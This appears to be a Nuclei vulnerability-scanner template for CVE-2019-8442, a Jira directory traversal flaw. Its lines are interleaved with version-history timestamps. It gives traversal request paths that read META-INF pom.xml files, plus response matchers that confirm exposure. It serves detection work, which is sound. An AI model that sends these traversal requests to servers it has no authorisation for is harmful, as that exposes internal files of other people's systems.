2021-01-02 04:59:06 +00:00
id : CVE-2019-8442
2022-04-22 10:38:41 +00:00
2020-10-02 19:50:52 +00:00
info :
name : JIRA Directory Traversal
author : Kishore Krishna (siLLyDaddy)
2021-09-10 11:26:40 +00:00
severity : high
2022-05-17 09:18:12 +00:00
description : The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.
2022-04-22 10:38:41 +00:00
reference :
- https://jira.atlassian.com/browse/JRASERVER-69241
2022-06-07 20:50:59 +00:00
- http://web.archive.org/web/20210125215006/https://www.securityfocus.com/bid/108460/
2021-09-10 11:26:40 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-8442
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,atlassian,jira,lfi
2021-02-05 19:44:41 +00:00
2020-10-02 19:50:52 +00:00
requests :
2021-08-23 09:24:04 +00:00
- method : GET
path :
- "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
- "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
2021-02-05 19:44:41 +00:00
2020-10-02 19:50:52 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
2021-08-23 09:24:04 +00:00
2020-10-02 19:50:52 +00:00
- type : word
words :
2021-08-23 09:24:04 +00:00
- '<groupId>com.atlassian.jira</groupId>'
2022-07-01 10:02:07 +00:00
part : body